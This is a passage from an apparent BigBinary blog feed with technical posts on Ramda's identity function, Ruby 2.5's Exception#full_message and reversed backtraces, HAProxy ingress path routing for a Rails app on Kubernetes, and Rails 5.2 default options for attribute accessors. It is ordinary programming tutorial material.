      <content type="html"><![CDATA[<p>If you are learning functional programming then you can't go far <a href="https://gist.github.com/Avaq/1f0636ec5c8d6aed2e45">without running into</a> the &quot;identity function&quot;.</p><p>An identity function is a very basic function that</p><ul><li>takes one argument</li><li>returns the argument</li></ul><pre><code class="language-javascript">f(x) = x;</code></pre><p>This seems like the most useless function in the world. We never needed any function like this while building any application. Then what's the big deal about this identity function?</p><p>In this blog we will see how the identity concept is used in the real world.</p><p>For the implementation we will be using <a href="http://ramdajs.com/">Ramda.js</a>. We previously <a href="https://blog.bigbinary.com/2017/10/06/optimize-javascript-code-for-composability-with-ramdajs.html">wrote about</a> how we, at BigBinary, write JavaScript code using Ramda.js.</p><p>Again, please note that in the following code <code>R</code> stands for <code>Ramda</code> and not for the <a href="https://www.r-project.org">programming language R</a>.</p><h3>Example 1</h3><p>Here is the JavaScript code.</p><pre><code class="language-javascript">if (x) return x;
return [];</code></pre><p>Here is the same code using Ramda.js.</p><pre><code class="language-javascript">R.ifElse(R.isNil, () =&gt; [], R.identity);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?const%20fn%20%3D%20R.ifElse%28%0A%20%20R.isNil%2C%0A%20%20%28%29%20%3D%3E%20%5B%5D%2C%0A%20%20R.identity%0A%20%29%3B%0A%0Afn%28null%29%3B%0Afn%28%22hello%22%29%3B">try it</a></p><h3>Example 2</h3><p>Here we will use identity as the return value in the default case.</p><pre><code class="language-javascript">R.cond([
  [R.equals(0), R.always(&quot;0&quot;)],
  [R.equals(10), R.always(&quot;10&quot;)],
  [R.T, R.identity],
]);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?const%20fn%20%3D%20R.cond%28%5B%0A%20%20%5BR.equals%280%29%2C%20R.always%28%220%22%29%5D%2C%0A%20%20%5BR.equals%2810%29%2C%20R.always%28%2210%22%29%5D%2C%0A%20%20%5BR.T%2C%20R.identity%5D%0A%5D%29%3B%0A%0A%0Afn%280%29%3B%0Afn%2810%29%3B%0Afn%285%29%3B">try it</a></p><h3>Example 3</h3><p>Get the unique items from the list.</p><pre><code class="language-javascript">R.uniqBy(R.identity, [1, 1, 2]);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?R.uniqBy%28R.identity%2C%20%5B1%2C1%2C2%5D%29">try it</a></p><h3>Example 4</h3><p>Count occurrences of items in the list.</p><pre><code class="language-javascript">R.countBy(R.identity, [&quot;a&quot;, &quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;c&quot;, &quot;c&quot;]);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?R.countBy%28R.identity%2C%20%5B%22a%22%2C%22a%22%2C%22b%22%2C%22c%22%2C%22c%22%2C%22c%22%5D%29%3B">try it</a></p><h3>Example 5</h3><p>Generate the values from zero up to n-1.</p><pre><code class="language-javascript">R.times(R.identity, 5);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?R.times%28R.identity%2C%205%29">try it</a></p><h3>Example 6</h3><p>Filter truthy values.</p><pre><code class="language-javascript">R.filter(R.identity, [
  { a: 1 },
  false,
  { b: 2 },
  true,
  &quot;&quot;,
  undefined,
  null,
  0,
  {},
  1,
]);</code></pre><p><a href="http://ramdajs.com/repl/#?R.filter%28R.identity%2C%20%5B%7Ba%3A1%7D%2C%20false%2C%20%7Bb%3A2%7D%2C%20true%2C%20%27%27%2C%20undefined%2C%20null%2C%200%2C%20%7B%7D%2C%201%5D%29%3B">try it</a></p>]]></content>
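Ruby, which most posts on this blog use, ships the same concept as `Object#itself`, and the Ramda examples above translate almost one-to-one. A small sketch, with one caveat: unlike JavaScript, `0` and the empty string are truthy in Ruby:

```ruby
# Ruby's built-in identity function is Object#itself;
# the Ramda patterns above map onto it almost one-to-one.

# Unique items, like R.uniqBy(R.identity, ...)
p [1, 1, 2].uniq(&:itself)
# => [1, 2]

# Count occurrences, like R.countBy(R.identity, ...)
p %w[a a b c c c].group_by(&:itself).transform_values(&:count)
# => {"a"=>2, "b"=>1, "c"=>3}

# Filter truthy values, like R.filter(R.identity, ...).
# Careful: unlike JavaScript, 0 and "" are truthy in Ruby.
p [{ a: 1 }, false, { b: 2 }, true, nil, 1].select(&:itself)
# => [{:a=>1}, {:b=>2}, true, 1]
```

`&:itself` converts the method into a block, so `select(&:itself)` keeps exactly the elements that are truthy as-is.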
    </entry><entry>
       <title><![CDATA[Ruby 2.5 adds Exception#full_message method]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-adds-exception-full_message-method"/>
      <updated>2018-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-adds-exception-full_message-method</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.5, if we wanted to log a caught exception, we would need to format it ourselves.</p><pre><code class="language-ruby">class AverageService
  attr_reader :numbers, :coerced_numbers

  def initialize(numbers)
    @numbers = numbers
    @coerced_numbers = coerce_numbers
  end

  def average
    sum / count
  end

  private

  def coerce_numbers
    numbers.map do |number|
      begin
        Float(number)
      rescue Exception =&gt; exception
        puts &quot;#{exception.message} (#{exception.class})\n\t#{exception.backtrace.join(&quot;\n\t&quot;)}&quot;
        puts &quot;Coercing '#{number}' as 0.0\n\n&quot;
        0.0
      end
    end
  end

  def sum
    coerced_numbers.map(&amp;:to_f).sum
  end

  def count
    coerced_numbers.size.to_f
  end
end

average = AverageService.new(ARGV).average
puts &quot;Average is: #{average}&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby average_service.rb 5 4f 7 1s0
invalid value for Float(): &quot;4f&quot; (ArgumentError)
	average_service.rb:18:in `Float'
	average_service.rb:18:in `block in coerce_numbers'
	average_service.rb:16:in `map'
	average_service.rb:16:in `coerce_numbers'
	average_service.rb:6:in `initialize'
	average_service.rb:37:in `new'
	average_service.rb:37:in `&lt;main&gt;'
Coercing '4f' as 0.0

invalid value for Float(): &quot;1s0&quot; (ArgumentError)
	average_service.rb:18:in `Float'
	average_service.rb:18:in `block in coerce_numbers'
	average_service.rb:16:in `map'
	average_service.rb:16:in `coerce_numbers'
	average_service.rb:6:in `initialize'
	average_service.rb:37:in `new'
	average_service.rb:37:in `&lt;main&gt;'
Coercing '1s0' as 0.0

Average is: 3.0</code></pre><p>It was <a href="https://bugs.ruby-lang.org/issues/14141">proposed</a> that there should be a simple method to print the caught exception using the same format that Ruby uses while printing an uncaught exception.</p><p>Some of the proposed method names were <code>display</code>, <code>formatted</code>, <code>to_formatted_s</code>, <code>long_message</code>, and <code>full_message</code>.</p><p>Matz <a href="https://bugs.ruby-lang.org/issues/14141#note-15">approved</a> the <code>Exception#full_message</code> method name.</p><p>In Ruby 2.5, we can re-write the above example as follows.</p><pre><code class="language-ruby">class AverageService
  attr_reader :numbers, :coerced_numbers

  def initialize(numbers)
    @numbers = numbers
    @coerced_numbers = coerce_numbers
  end

  def average
    sum / count
  end

  private

  def coerce_numbers
    numbers.map do |number|
      begin
        Float(number)
      rescue Exception =&gt; exception
        puts exception.full_message
        puts &quot;Coercing '#{number}' as 0.0\n\n&quot;
        0.0
      end
    end
  end

  def sum
    coerced_numbers.map(&amp;:to_f).sum
  end

  def count
    coerced_numbers.size.to_f
  end
end

average = AverageService.new(ARGV).average
puts &quot;Average is: #{average}&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby average_service.rb 5 4f 7 1s0
Traceback (most recent call last):
	6: from average_service.rb:37:in `&lt;main&gt;'
	5: from average_service.rb:37:in `new'
	4: from average_service.rb:6:in `initialize'
	3: from average_service.rb:16:in `coerce_numbers'
	2: from average_service.rb:16:in `map'
	1: from average_service.rb:18:in `block in coerce_numbers'
average_service.rb:18:in `Float': invalid value for Float(): &quot;4f&quot; (ArgumentError)
Coercing '4f' as 0.0

Traceback (most recent call last):
	6: from average_service.rb:37:in `&lt;main&gt;'
	5: from average_service.rb:37:in `new'
	4: from average_service.rb:6:in `initialize'
	3: from average_service.rb:16:in `coerce_numbers'
	2: from average_service.rb:16:in `map'
	1: from average_service.rb:18:in `block in coerce_numbers'
average_service.rb:18:in `Float': invalid value for Float(): &quot;1s0&quot; (ArgumentError)
Coercing '1s0' as 0.0

Average is: 3.0</code></pre><p>Note that Ruby 2.5 prints the exception backtrace in reverse order if STDERR is unchanged and is a TTY, as discussed <a href="https://blog.bigbinary.com/2018/03/07/ruby-2-5-prints-backstrace-and-error-message-in-reverse-order.html">in our previous blog post</a>.</p>]]></content>
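A minimal, self-contained way to see `full_message` in action (the invalid input string here is arbitrary):

```ruby
# Minimal sketch of Exception#full_message (Ruby 2.5+): it formats a caught
# exception the same way Ruby would have printed it had it gone uncaught.
begin
  Float("4f")
rescue ArgumentError => error
  formatted = error.full_message
  puts formatted # message, exception class and the full backtrace in one string
end
```

Because `full_message` returns a plain `String`, it can be handed directly to any logger instead of hand-assembling `message`, `class` and `backtrace` as in the pre-2.5 example.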
    </entry><entry>
       <title><![CDATA[Ruby 2.5 prints backtrace & error message in reverse]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-prints-backstrace-and-error-message-in-reverse-order"/>
      <updated>2018-03-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-prints-backstrace-and-error-message-in-reverse-order</id>
      <content type="html"><![CDATA[<p>A stack trace or backtrace is a sequential representation of the stack of method calls in a program which gets printed when an exception is raised. It is often used to find out the exact location in a program from where the exception was raised.</p><h2>Before Ruby 2.5</h2><p>Before Ruby 2.5, the printed backtrace contained the exception class and the error message at the top. The next line showed where in the program the exception was raised, followed by more lines containing the cascaded method calls.</p><p>Consider a simple Ruby program.</p><pre><code class="language-ruby">class DivisionService
  attr_reader :a, :b

  def initialize(a, b)
    @a, @b = a.to_i, b.to_i
  end

  def divide
    puts a / b
  end
end

DivisionService.new(ARGV[0], ARGV[1]).divide</code></pre><p>Let's execute it using Ruby 2.4.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby division_service.rb 5 0
division_service.rb:9:in `/': divided by 0 (ZeroDivisionError)
	from division_service.rb:9:in `divide'
	from division_service.rb:13:in `&lt;main&gt;'</code></pre><p>In the printed backtrace above, the first line shows the location, error message and the exception class name, whereas the subsequent lines show the caller method names and their locations. Each line in the backtrace above is often considered a stack frame placed on the call stack.</p><p>Most of the time, a backtrace has so many lines that it is very difficult to fit the whole backtrace in the visible viewport of the terminal.</p><p>Since the backtrace is printed in top to bottom order, the meaningful information like the error message, the exception class and the exact location where the exception was raised is displayed at the top of the backtrace. It means developers often need to scroll to the top in the terminal window to find out what went wrong.</p><h2>After Ruby 2.5</h2><p>Over 4 years ago an <a href="https://bugs.ruby-lang.org/issues/8661">issue</a> was created to make printing of the backtrace in reverse order configurable.</p><p>After much discussion, Nobuyoshi Nakada made the commit to print the backtrace and error message <a href="https://github.com/ruby/ruby/commit/5318154fe1ac6f8dff014988488b9e063988a105">in reverse order</a> only when the error output device (<code>STDERR</code>) is a TTY (i.e. a terminal). The message will not be printed in reverse order if the original <code>STDERR</code> is attached to something like a <code>File</code> object.</p><p><a href="https://github.com/ruby/ruby/blob/5318154fe1ac6f8dff014988488b9e063988a105/eval_error.c#L187-L195">Look at the code here</a> where the check happens whether <code>STDERR</code> is a TTY and is unchanged.</p><p>Let's execute the same program using Ruby 2.5.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby division_service.rb 5 0
Traceback (most recent call last):
	2: from division_service.rb:13:in `&lt;main&gt;'
	1: from division_service.rb:9:in `divide'
division_service.rb:9:in `/': divided by 0 (ZeroDivisionError)
$</code></pre><p>We can notice two new changes in the above backtrace.</p><ol><li>The error message and exception class are printed last (i.e. at the bottom).</li><li>The stack also <a href="https://github.com/ruby/ruby/commit/87023a1dcc548f0eb7ccfacd64d795093d1c7e17">adds a frame number</a> when printing in reverse order.</li></ol><p>This feature makes debugging convenient when the backtrace is quite big and cannot fit in the terminal window. We can now easily see the error message without scrolling up.</p><p>Note that the <code>Exception#backtrace</code> attribute still holds an array of stack frames, like before, in the top to bottom order.</p><p>So if we rescue the caught exception and print the backtrace manually</p><pre><code class="language-ruby">class DivisionService
  attr_reader :a, :b

  def initialize(a, b)
    @a, @b = a.to_i, b.to_i
  end

  def divide
    puts a / b
  end
end

begin
  DivisionService.new(ARGV[0], ARGV[1]).divide
rescue Exception =&gt; e
  puts &quot;#{e.class}: #{e.message}&quot;
  puts e.backtrace.join(&quot;\n&quot;)
end</code></pre><p>we will get the old behavior.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby division_service.rb 5 0
ZeroDivisionError: divided by 0
division_service.rb:9:in `/'
division_service.rb:9:in `divide'
division_service.rb:16:in `&lt;main&gt;'
$</code></pre><p>Also, note that if we assign <code>STDERR</code> a <code>File</code> object, thus making it a non-TTY</p><pre><code class="language-ruby">puts &quot;STDERR is a TTY? [before]: #{$stderr.tty?}&quot;
$stderr = File.new(&quot;stderr.log&quot;, &quot;w&quot;)
$stderr.sync = true
puts &quot;STDERR is a TTY? [after]: #{$stderr.tty?}&quot;

class DivisionService
  attr_reader :a, :b

  def initialize(a, b)
    @a, @b = a.to_i, b.to_i
  end

  def divide
    puts a / b
  end
end

DivisionService.new(ARGV[0], ARGV[1]).divide</code></pre><p>we also get the old behavior, but the backtrace is written to the specified file and not to <code>STDERR</code>.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby division_service.rb 5 0
STDERR is a TTY? [before]: true
STDERR is a TTY? [after]: false
$ cat stderr.log
division_service.rb:14:in `/': divided by 0 (ZeroDivisionError)
	from division_service.rb:14:in `divide'
	from division_service.rb:18:in `&lt;main&gt;'
$</code></pre><p>This feature has been tagged as an <a href="https://github.com/ruby/ruby/commit/5b58d8e6d8d187f37750540535f741cf6c2b661a">experimental feature</a>. What it means is that the Ruby team is <a href="https://bugs.ruby-lang.org/issues/8661#journal-64903-notes">gathering feedback</a> on this feature.</p>]]></content>
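To double-check the note about `Exception#backtrace`, here is a small sketch (the method names are mine) showing that the array remains innermost-frame-first regardless of how the uncaught report is printed:

```ruby
# Sketch: Exception#backtrace still lists frames innermost-first,
# independent of the reversed printing of uncaught exceptions.
def inner_divide; 1 / 0; end
def outer_call; inner_divide; end

begin
  outer_call
rescue ZeroDivisionError => error
  frames = error.backtrace
  # The inner_divide frame appears before the outer_call frame.
  puts frames.first(3)
end
```

So any log-parsing or error-reporting code that walks `backtrace` from index 0 inward keeps working unchanged on Ruby 2.5.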
    </entry><entry>
       <title><![CDATA[Setup path based routing for a Rails app with HAProxy Ingress]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/using-haproxy-ingress-with-rails-uniconrn-and-websockets"/>
      <updated>2018-02-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-haproxy-ingress-with-rails-uniconrn-and-websockets</id>
      <content type="html"><![CDATA[<p>After months of testing we recently moved a Ruby on Rails application toproduction that is using Kubernetes cluster.</p><p>In this article we will discuss how to setup path based routing for a Ruby onRails application in kubernetes using HAProxy ingress.</p><p>This post assumes that you have basic understanding of<a href="http://kubernetes.io/">Kubernetes</a> terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>,<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>,<a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>,<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a>and <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">ingress</a>.</p><p>Typically our Rails app has services like unicorn/puma,sidekiq/delayed-job/resque, Websockets and some dedicated API services. We hadone web service exposed to the world using load balancer and it was workingwell. 
But as the traffic increased it became necessary to route traffic based onURLs/path.</p><p>However Kubernetes does not supports this type of load balancing out of the box.There is work in progress for<a href="https://github.com/coreos/alb-ingress-controller">alb-ingress-controller</a> tosupport this but we could not rely on it for production usage as it is still inalpha.</p><p>The best way to achieve path based routing was to use<a href="https://kubernetes.io/docs/concepts/services-networking/ingress/#ingress-controllers">ingress controller</a>.</p><p>We researched and found that there are different types of ingress available ink8s world.</p><ol><li><a href="https://github.com/kubernetes/ingress-nginx">nginx-ingress</a></li><li><a href="https://github.com/kubernetes/ingress-gce">ingress-gce</a></li><li><a href="https://github.com/jcmoraisjr/haproxy-ingress">HAProxy-ingress</a></li><li><a href="https://docs.traefik.io/providers/kubernetes-ingress/">traefik</a></li><li><a href="https://github.com/appscode/voyager">voyager</a></li></ol><p>We experimented with nginx-ingress and HAProxy and decided to go with HAProxy.HAProxy has better support for Rails websockets which we needed in the project.</p><p>We will walk you through step by step on how to use haproxy ingress in a Railsapp.</p><h3>Configuring Rails app with HAProxy ingress controller</h3><p>Here is what we are going to do.</p><ul><li>Create a Rails app with different services and deployments.</li><li>Create tls secret for SSL.</li><li>Create HAProxy ingress configmap.</li><li>Create HAProxy ingress controller.</li><li>Expose ingress with service type LoadBalancer</li><li>Setup app DNS with ingress service.</li><li>Create different ingress rules specifying path based routing.</li><li>Test the path based routing.</li></ul><p>Now let's build Rails application deployment manifest for services likeweb(unicorn),background(sidekiq), Websocket(ruby thin),API(dedicated unicorn).</p><p>Here is our web app deployment and 
service template.</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: test-production-web
  labels:
    app: test-production-web
  namespace: test
spec:
  template:
    metadata:
      labels:
        app: test-production-web
    spec:
      containers:
      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
        name: test-production
        imagePullPolicy: Always
        env:
        - name: POSTGRES_HOST
          value: test-production-postgres
        - name: REDIS_HOST
          value: test-production-redis
        - name: APP_ENV
          value: production
        - name: APP_TYPE
          value: web
        - name: CLIENT
          value: test
        ports:
        - containerPort: 80
      imagePullSecrets:
        - name: registrykey
---
apiVersion: v1
kind: Service
metadata:
  name: test-production-web
  labels:
    app: test-production-web
  namespace: test
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: test-production-web</code></pre><p>Here is the background app deployment and service template.</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: test-production-background
  labels:
    app: test-production-background
  namespace: test
spec:
  template:
    metadata:
      labels:
        app: test-production-background
    spec:
      containers:
      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
        name: test-production
        imagePullPolicy: Always
        env:
        - name: POSTGRES_HOST
          value: test-production-postgres
        - name: REDIS_HOST
          value: test-production-redis
        - name: APP_ENV
          value: production
        - name: APP_TYPE
          value: background
        - name: CLIENT
          value: test
        ports:
        - containerPort: 80
      imagePullSecrets:
        - name: registrykey
---
apiVersion: v1
kind: Service
metadata:
  name: test-production-background
  labels:
    app: test-production-background
  namespace: test
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: test-production-background</code></pre><p>Here is the websocket app deployment and service template.</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: test-production-websocket
  labels:
    app: test-production-websocket
  namespace: test
spec:
  template:
    metadata:
      labels:
        app: test-production-websocket
    spec:
      containers:
      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
        name: test-production
        imagePullPolicy: Always
        env:
        - name: POSTGRES_HOST
          value: test-production-postgres
        - name: REDIS_HOST
          value: test-production-redis
        - name: APP_ENV
          value: production
        - name: APP_TYPE
          value: websocket
        - name: CLIENT
          value: test
        ports:
        - containerPort: 80
      imagePullSecrets:
        - name: registrykey
---
apiVersion: v1
kind: Service
metadata:
  name: test-production-websocket
  labels:
    app: test-production-websocket
  namespace: test
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: test-production-websocket</code></pre><p>Here is the API app deployment and service template.</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: test-production-api
  labels:
    app: test-production-api
  namespace: test
spec:
  template:
    metadata:
      labels:
        app: test-production-api
    spec:
      containers:
      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
        name: test-production
        imagePullPolicy: Always
        env:
        - name: POSTGRES_HOST
          value: test-production-postgres
        - name: REDIS_HOST
          value: test-production-redis
        - name: APP_ENV
          value: production
        - name: APP_TYPE
          value: api
        - name: CLIENT
          value: test
        ports:
        - containerPort: 80
      imagePullSecrets:
        - name: registrykey
---
apiVersion: v1
kind: Service
metadata:
  name: test-production-api
  labels:
    app: test-production-api
  namespace: test
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: test-production-api</code></pre><p>Let's launch these manifests using <code>kubectl apply</code>.</p><pre><code class="language-bash">$ kubectl apply -f test-web.yml -f test-background.yml -f test-websocket.yml -f test-api.yml
deployment &quot;test-production-web&quot; created
service &quot;test-production-web&quot; created
deployment &quot;test-production-background&quot; created
service &quot;test-production-background&quot; created
deployment &quot;test-production-websocket&quot; created
service &quot;test-production-websocket&quot; created
deployment &quot;test-production-api&quot; created
service &quot;test-production-api&quot; created</code></pre><p>Once our app is deployed and running, we should create the HAProxy ingress. Before that, let's create a tls secret with our SSL key and certificate.</p><p>This secret is also used to enable HTTPS for the app URL and to terminate SSL at L7.</p><pre><code class="language-bash">$ kubectl create secret tls tls-certificate --key server.key --cert server.pem</code></pre><p>Here <code>server.key</code> is our SSL key and <code>server.pem</code> is our SSL certificate in pem format.</p><p>Now let's create the HAProxy controller resources.</p><h3>HAProxy configmap</h3><p>For all the available HAProxy configuration parameters, refer <a href="https://github.com/jcmoraisjr/HAProxy-ingress#configmap">here</a>.</p><pre><code class="language-yaml">apiVersion: v1
data:
  dynamic-scaling: &quot;true&quot;
  backend-server-slots-increment: &quot;4&quot;
kind: ConfigMap
metadata:
  name: haproxy-configmap
  namespace: test</code></pre><h3>HAProxy Ingress controller deployment</h3><p>Here is the deployment template for the Ingress controller, with at least 2 replicas to manage rolling deploys.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  labels:
    run: haproxy-ingress
  name: haproxy-ingress
  namespace: test
spec:
  replicas: 2
  selector:
    matchLabels:
      run: haproxy-ingress
  template:
    metadata:
      labels:
        run: haproxy-ingress
    spec:
      containers:
        - name: haproxy-ingress
          image: quay.io/jcmoraisjr/haproxy-ingress:v0.5-beta.1
          args:
            - --default-backend-service=$(POD_NAMESPACE)/test-production-web
            - --default-ssl-certificate=$(POD_NAMESPACE)/tls-certificate
            - --configmap=$(POD_NAMESPACE)/haproxy-configmap
            - --ingress-class=haproxy
          ports:
            - name: http
              containerPort: 80
            - name: https
              containerPort: 443
            - name: stat
              containerPort: 1936
          env:
            - name: POD_NAME
              valueFrom:
                fieldRef:
                  fieldPath: metadata.name
            - name: POD_NAMESPACE
              valueFrom:
                fieldRef:
                  fieldPath: metadata.namespace</code></pre><p>The notable fields in the above manifest are the arguments passed to the controller.</p><p><code>--default-backend-service</code> is the service that serves a request when no ingress rule matches it.</p><p>In our case it is the <code>test-production-web</code> service, but it can be a custom 404 page or whatever you think is better.</p><p><code>--default-ssl-certificate</code> is the SSL secret we just created above. It terminates SSL at L7, so our app is served over HTTPS to the outside world.</p><h3>HAProxy Ingress service</h3><p>This is the <code>LoadBalancer</code> type service that allows client traffic to reach our Ingress Controller.</p><p>The LoadBalancer has access to both the public network and the internal Kubernetes network, while retaining the L7 routing of the Ingress Controller.</p><pre><code class="language-yaml">apiVersion: v1
kind: Service
metadata:
  labels:
    run: haproxy-ingress
  name: haproxy-ingress
  namespace: test
spec:
  type: LoadBalancer
  ports:
    - name: http
      port: 80
      protocol: TCP
      targetPort: 80
    - name: https
      port: 443
      protocol: TCP
      targetPort: 443
    - name: stat
      port: 1936
      protocol: TCP
      targetPort: 1936
  selector:
    run: haproxy-ingress</code></pre><p>Now let's apply all the HAProxy manifests.</p><pre><code class="language-bash">$ kubectl apply -f haproxy-configmap.yml -f haproxy-deployment.yml -f haproxy-service.yml
configmap &quot;haproxy-configmap&quot; created
deployment &quot;haproxy-ingress&quot; created
service &quot;haproxy-ingress&quot; created</code></pre><p>Once all the resources are running, get the LoadBalancer endpoint.</p><pre><code class="language-bash">$ kubectl -n test get svc haproxy-ingress -o wide
NAME              TYPE           CLUSTER-IP       EXTERNAL-IP                                                              PORT(S)                                     AGE       SELECTOR
haproxy-ingress   LoadBalancer   100.67.194.186   a694abcdefghi11e8bc3b0af2eb5c5d8-806901662.us-east-1.elb.amazonaws.com   80:31788/TCP,443:32274/TCP,1936:32157/TCP   2m        run=haproxy-ingress</code></pre><h3>DNS mapping with application URL</h3><p>Once we have the ELB endpoint of the ingress service, map the DNS for a URL like <code>test-rails-app.com</code> to it.</p><h3>Ingress Implementation</h3><p>After doing all the hard work, it is time to configure the ingress and the path based rules.</p><p>In our case we want the following rules.</p><p><em>https://test-rails-app.com</em> requests to be served by <code>test-production-web</code>.</p><p><em>https://test-rails-app.com/websocket</em> requests to be served by <code>test-production-websocket</code>.</p><p><em>https://test-rails-app.com/api</em> requests to be served by <code>test-production-api</code>.</p><p>Let's create an ingress manifest defining all the rules.</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: ingress
  namespace: test
spec:
  tls:
    - hosts:
        - test-rails-app.com
      secretName: tls-certificate
  rules:
    - host: test-rails-app.com
      http:
        paths:
          - path: /
            backend:
              serviceName: test-production-web
              servicePort: 80
          - path: /api
            backend:
              serviceName: test-production-api
              servicePort: 80
          - path: /websocket
            backend:
              serviceName: test-production-websocket
              servicePort: 80</code></pre><p>Moreover, there are <a href="https://github.com/jcmoraisjr/haproxy-ingress#annotations">Ingress Annotations</a> for making further configuration changes.</p><p>As expected, our default traffic on <code>/</code> is now routed to the <code>test-production-web</code> service.</p><p><code>/api</code> is routed to the <code>test-production-api</code> service.</p><p><code>/websocket</code> is routed to the <code>test-production-websocket</code> service.</p><p>Thus the ingress implementation solves our purpose of path based routing and terminating SSL at L7 on Kubernetes.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 adds default option to module and class attribute accessors]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-default-options-to-module-and-class-attribute-accessors"/>
      <updated>2018-02-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-default-options-to-module-and-class-attribute-accessors</id>
      <content type="html"><![CDATA[<p>When DHH introduced <a href="https://blog.bigbinary.com/2018/02/21/rails-5-2-supports-specifying-default-value-for-a-class_attribute.html">support for specifying a default value for class_attribute</a>, Genadi Samokovarov <a href="https://github.com/rails/rails/pull/29270#issuecomment-304705841">brought to notice</a> that the module and class attribute accessor macros also support specifying a default value, but using a block and not with a <code>default</code> option.</p><p>To have consistent and symmetrical behaviour across all the attribute extensions, it was decided to support specifying a default value using the <code>default</code> option for all the module and class attribute macros as well.</p><p>The <code>mattr_accessor</code>, <code>mattr_reader</code> and <code>mattr_writer</code> macros generate getter and setter methods at the module level.</p><p>Similarly, the <code>cattr_accessor</code>, <code>cattr_reader</code>, and <code>cattr_writer</code> macros generate getter and setter methods at the class level.</p><h2>Before Rails 5.2</h2><p>Before Rails 5.2, this is how we would set the default values for the module and class attribute accessor macros.</p><pre><code class="language-ruby">module ActivityLoggerHelper
  mattr_accessor :colorize_logs
  mattr_writer(:log_ip) { false }

  self.colorize_logs = true
end

class ActivityLogger
  include ActivityLoggerHelper

  cattr_writer(:logger) { Logger.new(STDOUT) }
  cattr_accessor :level
  cattr_accessor :settings
  cattr_reader(:pid) { Process.pid }

  @@level = Logger::DEBUG
  self.settings = {}
end</code></pre><h2>After Rails 5.2</h2><p>We can still set a default value of a module or class attribute accessor by providing a block. 
In this <a href="https://github.com/rails/rails/pull/29294">pull request</a>, support for specifying a default value using a new <code>default</code> option has been introduced.</p><p>So instead of</p><pre><code class="language-ruby">cattr_writer(:logger) { Logger.new(STDOUT) }</code></pre><p>or</p><pre><code class="language-ruby">cattr_writer :logger
self.logger = Logger.new(STDOUT)</code></pre><p>or</p><pre><code class="language-ruby">cattr_writer :logger
@@logger = Logger.new(STDOUT)</code></pre><p>we can now simply write</p><pre><code class="language-ruby">cattr_writer :logger, default: Logger.new(STDOUT)</code></pre><p>The same applies to the other attribute accessor macros like <code>mattr_accessor</code>, <code>mattr_reader</code>, <code>mattr_writer</code>, <code>cattr_accessor</code>, and <code>cattr_reader</code>.</p><p>Note that the old way of specifying a default value using the block syntax will still work, but it will not be documented anywhere.</p><p>Also, note that if we try to set the default value in both ways, i.e. 
by providing a block as well as by specifying a <code>default</code> option, the value provided by the <code>default</code> option will always take precedence.</p><pre><code class="language-ruby">mattr_accessor(:colorize_logs, default: true) { false }</code></pre><p>Here, <code>@@colorize_logs</code> would be set to <code>true</code> as per the above precedence rule.</p><p><a href="https://github.com/rails/rails/blob/b6b0c99ff3e8ace3f42813154dbe4b8ad6a98e6c/activesupport/test/core_ext/module/attribute_accessor_test.rb#L45-L47">Here is a test</a> which verifies this behavior.</p><p>Finally, here is the simplified version using the new <code>default</code> option.</p><pre><code class="language-ruby">module ActivityLoggerHelper
  mattr_accessor :colorize_logs, default: true
  mattr_writer :log_ip, default: false
end

class ActivityLogger
  include ActivityLoggerHelper

  cattr_writer :logger, default: Logger.new(STDOUT)
  cattr_accessor :level, default: Logger::DEBUG
  cattr_accessor :settings, default: {}
  cattr_reader :pid, default: Process.pid
end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 supports specifying default value for class_attribute]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-supports-specifying-default-value-for-a-class_attribute"/>
